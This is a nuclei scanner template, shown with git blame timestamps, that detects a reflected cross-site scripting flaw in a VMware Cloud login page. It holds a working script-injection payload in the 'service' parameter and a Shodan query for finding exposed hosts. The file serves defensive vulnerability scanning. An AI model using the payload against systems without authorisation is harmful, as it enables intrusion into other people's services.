nuclei-templates/http/vulnerabilities/vmware/vmware-cloud-xss.yaml

34 lines
686 B
YAML
Raw Normal View History

2023-01-25 10:45:20 +00:00
id: vmware-cloud-xss
2023-01-23 18:39:37 +00:00
info:
name: VMWare Cloud - Cross Site Scripting
author: tess
severity: medium
metadata:
verified: true
2023-01-25 10:45:20 +00:00
shodan-query: title:"Vmware Cloud"
tags: vmware,xss,cloud
2023-01-23 18:39:37 +00:00
http:
2023-01-23 18:39:37 +00:00
- method: GET
path:
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
2023-01-25 10:45:20 +00:00
- 'let tokens = "'
2023-01-23 18:39:37 +00:00
condition: and
- type: word
part: header
words:
2023-01-25 10:45:20 +00:00
- 'text/html'
2023-01-23 18:39:37 +00:00
- type: status
status:
- 200